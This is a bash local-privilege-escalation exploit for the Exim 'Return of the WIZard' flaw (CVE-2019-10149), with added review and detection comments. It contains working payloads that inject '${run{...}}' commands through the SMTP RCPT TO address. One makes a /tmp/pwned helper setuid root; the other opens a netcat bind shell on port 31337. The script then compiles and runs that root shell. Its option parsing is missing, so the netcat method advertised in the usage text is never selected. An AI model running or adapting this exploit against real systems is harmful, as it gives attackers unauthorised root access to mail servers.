  1. #!/bin/bash
  2.  
  3. #
  4. # raptor_exim_wiz - "The Return of the WIZard" LPE exploit
  5. # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
  6. #
  7. # A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
  8. # Improper validation of recipient address in deliver_message()
  9. # function in /src/deliver.c may lead to remote command execution.
  10. # (CVE-2019-10149)
  11. #
  12. # This is a local privilege escalation exploit for "The Return
  13. # of the WIZard" vulnerability reported by the Qualys Security
  14. # Advisory team.
  15. #
  16. # Credits:
  17. # Qualys Security Advisory team (kudos for your amazing research!)
  18. # Dennis 'dhn' Herrmann (/dev/tcp technique)
  19. #
  20. # Usage (setuid method):
  21. # $ id
  22. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  23. # $ ./raptor_exim_wiz -m setuid
  24. # Preparing setuid shell helper...
  25. # Delivering setuid payload...
  26. # [...]
  27. # Waiting 5 seconds...
  28. # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
  29. # # id
  30. # uid=0(root) gid=0(root) groups=0(root)
  31. #
  32. # Usage (netcat method):
  33. # $ id
  34. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  35. # $ ./raptor_exim_wiz -m netcat
  36. # Delivering netcat payload...
  37. # Waiting 5 seconds...
  38. # localhost [127.0.0.1] 31337 (?) open
  39. # id
  40. # uid=0(root) gid=0(root) groups=0(root)
  41. #
  42. # Vulnerable platforms:
  43. # Exim 4.87 - 4.91
  44. #
  45. # Tested against:
  46. # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
  47. #
  48.  
  49. METHOD="setuid" # default method
  50. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  51. PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
  52.  
  53. # usage instructions
usage() {
  # Print the command-line synopsis and leave with status 1.
  # Globals:   none ($0 is the script name as invoked)
  # Outputs:   synopsis on stdout
  # Returns:   never returns; exits 1
  cat <<EOF
$0 [-m METHOD]

-m setuid : use the setuid payload (default)
-m netcat : use the netcat payload

EOF
  exit 1
}
  63.  
  64. # payload delivery
function exploit()
{
# Talks SMTP to the local MTA over a bash /dev/tcp socket on fd 3 and sends
# $PAYLOAD as the RCPT TO envelope address, i.e. the recipient-address path
# named in the CVE-2019-10149 description in the header.
# Globals:   PAYLOAD (read)
# Outputs:   every server reply is echoed to stdout; $REPLY is unquoted, so
#            it is subject to word splitting and globbing (ShellCheck SC2086)
# Returns:   status of the last read
# NOTE(review): the connection attempt is not checked explicitly and the
# script never enables set -e; what happens after a failed exec redirection
# is left to bash's defaults - confirm before trusting the echoed output.
# For defenders: the RCPT TO line below is what shows up in the MTA log and
# on the wire; alert on recipient addresses containing "${run{".

# connect to localhost:25
exec 3<>/dev/tcp/localhost/25

# deliver the payload
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:<$PAYLOAD>" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
# 31 filler header lines, then the end-of-DATA marker
for i in {1..31}
do
echo "Received: $i" >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
}
  89.  
# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
# NOTE(review): the option-parsing code is absent from this paste. Nothing
# below changes METHOD, so the status line always reports "setuid" and
# PAYLOAD is always assigned PAYLOAD_SETUID regardless of any -m argument.




# prepare a setuid shell helper to circumvent bash checks
# Writes a tiny C helper to /tmp/pwned.c and compiles it to /tmp/pwned;
# if gcc fails, /bin/sh is copied there instead. Both names are fixed,
# world-visible paths (no mktemp), which is also what host monitoring
# can watch: creation of /tmp/pwned.c, a gcc invocation writing to /tmp,
# and a later chown/chmod of /tmp/pwned to a setuid-root binary.
echo "Preparing setuid shell helper..."
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
if [ $? -ne 0 ]; then   # style: `if ! gcc ...; then` avoids the $? check
echo "Problems compiling setuid shell helper, check your gcc."
echo "Falling back to the /bin/sh method."
cp /bin/sh /tmp/pwned
fi
echo

# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_SETUID
exploit
echo

# wait for the magic to happen and spawn our shell
# Fixed 5-second wait: nothing verifies that the delivery succeeded before
# /tmp/pwned is listed and executed, so the ls output is the only feedback.
echo "Waiting 5 seconds..."
sleep 5
ls -l /tmp/pwned
/tmp/pwned